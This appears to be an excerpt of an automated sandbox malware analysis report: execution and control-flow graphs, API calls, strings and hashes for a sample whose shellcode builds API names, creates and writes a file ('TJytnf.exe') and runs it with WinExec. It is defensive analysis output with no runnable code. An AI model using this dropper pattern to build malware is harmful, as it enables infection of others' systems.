                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1568
                        Imagebase:0xe80000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:0.4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:87.5%
                          Total number of Nodes:8
                          Total number of Limit Nodes:1
                          execution_graph 4709 740000 4711 740044 GetPEB 4709->4711 4713 740077 CreateFileA 4711->4713 4714 740265 4713->4714 4715 74022d 4713->4715 4716 740246 WriteFile 4715->4716 4717 740244 4715->4717 4718 740255 FindCloseChangeNotification WinExec 4716->4718 4717->4718 4718->4714

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 740044-740074 GetPEB 1 740077-74009a 0->1 2 74009d-7400a0 1->2 3 7400a6-7400bc 2->3 4 7401ee-74022b CreateFileA 2->4 5 740110-740116 3->5 6 7400be-7400c5 3->6 24 740265-740269 4->24 25 74022d-740230 4->25 8 740118-74011f 5->8 9 740129-74012f 5->9 6->5 10 7400c7-7400ce 6->10 8->9 11 740121-740124 8->11 12 740131-740138 9->12 13 740148-74014e 9->13 10->5 14 7400d0-7400d7 10->14 16 7401bb-7401c0 11->16 12->13 17 74013a-740141 12->17 18 740167-74016f 13->18 19 740150-740157 13->19 14->5 20 7400d9-7400dd 14->20 27 7401e0-7401e9 16->27 28 7401c2-7401c5 16->28 17->13 26 740143-740146 17->26 21 740171-740178 18->21 22 740188-74018e 18->22 19->18 29 740159-740160 19->29 20->5 23 7400df-7400e3 20->23 21->22 30 74017a-740181 21->30 32 7401a7-7401ad 22->32 33 740190-740197 22->33 23->16 31 7400e9-74010b 23->31 34 740232-740238 25->34 26->16 27->2 28->27 35 7401c7-7401ca 28->35 29->18 36 740162-740165 29->36 30->22 37 740183-740186 30->37 31->1 32->16 39 7401af-7401b6 32->39 33->32 38 740199-7401a0 33->38 40 740246-740252 WriteFile 34->40 41 74023a-740242 34->41 35->27 42 7401cc-7401cf 35->42 36->16 37->16 38->32 44 7401a2-7401a5 38->44 39->16 45 7401b8 39->45 47 740255-740262 FindCloseChangeNotification WinExec 40->47 41->34 46 740244 41->46 42->27 48 7401d1-7401d4 42->48 44->16 45->16 46->47 47->24 48->27 49 7401d6-7401d9 48->49 49->27 50 7401db-7401de 49->50 50->4 50->27
                          APIs
                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00740223
                          • WriteFile.KERNELBASE(00000000,FFEC74CC,00003E00,?,00000000), ref: 00740252
                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00740256
                          • WinExec.KERNEL32(?,00000005), ref: 00740262
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                          • String ID: .dll$Clos$Crea$GetM$GetT$Kern$TJytnf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
                          • API String ID: 2234911746-2051679233
                          • Opcode ID: e199eddd33a27495d627918e3a499fccf7fe6845e9a388fd4e39f2dae1141158
                          • Instruction ID: 586f86233e2cf17913a23bd254e9a1c0644a6c8c069bb837390bc4b2348fd581
                          • Opcode Fuzzy Hash: e199eddd33a27495d627918e3a499fccf7fe6845e9a388fd4e39f2dae1141158
                          • Instruction Fuzzy Hash: E7611775D0121ADBCF24CF94C884ABDFBB4BF48315F2586AAD605AB641C3789E81CBD1
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID: &$D
                          • API String ID: 0-1138263919
                          • Opcode ID: 16946f61db68bcfa531c36d6d805463b69b88be8b43f4469fbf2aaa6f77174ea
                          • Instruction ID: e966281431bde8f5ced9cdf8469f613dde040be4f3ae541fddc8c2c659d61bd9
                          • Opcode Fuzzy Hash: 16946f61db68bcfa531c36d6d805463b69b88be8b43f4469fbf2aaa6f77174ea
                          • Instruction Fuzzy Hash: ECC11476A107454BE744CF39CC806AAB7D2EFC4305F148A3AE911C3396EB78D649C7A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 5d0147e1b8e4f5d6d3a745a26ed7d802266730a9675a78caf94c80bb1a58acd4
                          • Instruction ID: 80d21c34bb6ae7158faf62bcd033f9d34088e83b4646355621e00821d873ed2c
                          • Opcode Fuzzy Hash: 5d0147e1b8e4f5d6d3a745a26ed7d802266730a9675a78caf94c80bb1a58acd4
                          • Instruction Fuzzy Hash: 2C315972A007094BE724DE299C4956BB3E4DFC0305F044A3FF952C3342EA38EA49C7A9
                          Strings
                          • NETHASP_00112233445566zz, xrefs: 00442A77
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID: NETHASP_00112233445566zz
                          • API String ID: 0-526728173
                          • Opcode ID: d600ed2a37e33558740473f6b209a886bd2979a05da70e6f98333cf0bf7521f6
                          • Instruction ID: c01a8595a570e52076e6c81c97361f43471d4346ebe204a663ac6df0e50c8e0d
                          • Opcode Fuzzy Hash: d600ed2a37e33558740473f6b209a886bd2979a05da70e6f98333cf0bf7521f6
                          • Instruction Fuzzy Hash: 2731F70E9593C24DE325DB7888107FBAFE29FE6210F5D49BE98D98B783C4294046D3B1
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd94b818cdc8712dc955d815b6b14d439c12b0c554483b827a4191f1f18468a8
                          • Instruction ID: 5621dbd42eb087a3efff43b148d242805c835e3021cf1da33a348ce65f153428
                          • Opcode Fuzzy Hash: bd94b818cdc8712dc955d815b6b14d439c12b0c554483b827a4191f1f18468a8
                          • Instruction Fuzzy Hash: 8E020B7690878A8FD714DF1CC84162AB7E1BFC8304F4A096CEA909B356DB78F915CB85
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 89d31817f79e43d1fcc6de6552c2b922a3367e755c2ee81730d96a6ef8bda629
                          • Instruction ID: 53ccb12187c115fc644893fb2bd5b782b7f6e5df37e2e0993c5105b0d6249dbf
                          • Opcode Fuzzy Hash: 89d31817f79e43d1fcc6de6552c2b922a3367e755c2ee81730d96a6ef8bda629
                          • Instruction Fuzzy Hash: 19020B7690878A8FD714DF1CC84162AB7E1BFC8304F4A096CEA909B356DB78F915CB85
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fa0581a7e887880e07d6ed4b153e311fd59c7b35d25d5a62e0b506935308d7da
                          • Instruction ID: 6d36cd6d847ac50dff605874ce029c1b3f790dd0e664c9ca5f43211dfae37df0
                          • Opcode Fuzzy Hash: fa0581a7e887880e07d6ed4b153e311fd59c7b35d25d5a62e0b506935308d7da
                          • Instruction Fuzzy Hash: 2971579698E3C05FD71347B058696917FB0AE23124B5F92DBC8C6CF8A3E54D484AC323
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dfb336ec09bbebb29675f50539243b0cc2fdd3e4537de5a9ff245748efdf1395
                          • Instruction ID: 9aa426ad075d82161b80894cc8baeffa32b3dde6747d47502b9ba796aab667d1
                          • Opcode Fuzzy Hash: dfb336ec09bbebb29675f50539243b0cc2fdd3e4537de5a9ff245748efdf1395
                          • Instruction Fuzzy Hash: 4F51F3756092814BE720DE39D841AEBBBD6DFD9314F09897AE9C8C3302D029D85D87A6
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 85ce41991173dbadcfdea74fd3bd294495b0c6485591fe382654d4bfbba070e6
                          • Instruction ID: 21d6890e665c97951741c4f196da70ae8bd21b77b76669c31e00aa3f47cb015d
                          • Opcode Fuzzy Hash: 85ce41991173dbadcfdea74fd3bd294495b0c6485591fe382654d4bfbba070e6
                          • Instruction Fuzzy Hash: 07619E719083019FD714DF24D881B6BBBE0FB89319F44482EF88997352D339EA49CB96
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a682b18139214241742368ae0951ac6ff74cfb4a1e3dddf2ab81183e74a6f54c
                          • Instruction ID: e760f3c057393c1c42fa8d829563a35c3de7d9169446fb1d9e2c12d635d1a7f5
                          • Opcode Fuzzy Hash: a682b18139214241742368ae0951ac6ff74cfb4a1e3dddf2ab81183e74a6f54c
                          • Instruction Fuzzy Hash: 7C417BB2A01B454BF318CB2CCC8976BB792DBC4305F148B2ED512D7786DA78A505C3A8
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325839186.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_biKy3nZEyJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f23e764a258e746145005bb8f228fc192aa5f362aa6b61e6851fcbfe09853e0d
                          • Instruction ID: 53e8721af9d2935ff255f281c9490100fd106ccb408c2b8e94a8cc1d056f0990
                          • Opcode Fuzzy Hash: f23e764a258e746145005bb8f228fc192aa5f362aa6b61e6851fcbfe09853e0d
                          • Instruction Fuzzy Hash: 7AF0F69BA0161F5FC310EE68B8801E3B3DBE7B67A0B1A1461E740C7321E1A11809E254
                          Memory Dump Source
                          • Source File: 00000001.00000002.1325278499.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.1325264255.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325537851.000000000065C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325600601.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325619650.00000000006E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325705190.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325719472.00000000006E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.00000000006EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000733000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000737000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325734513.0000000000739000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325805483.000000000073B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000001.00000002.1325824957.0000000000740000.00000040.00000001.01000000.00000003.sdmpDownload File
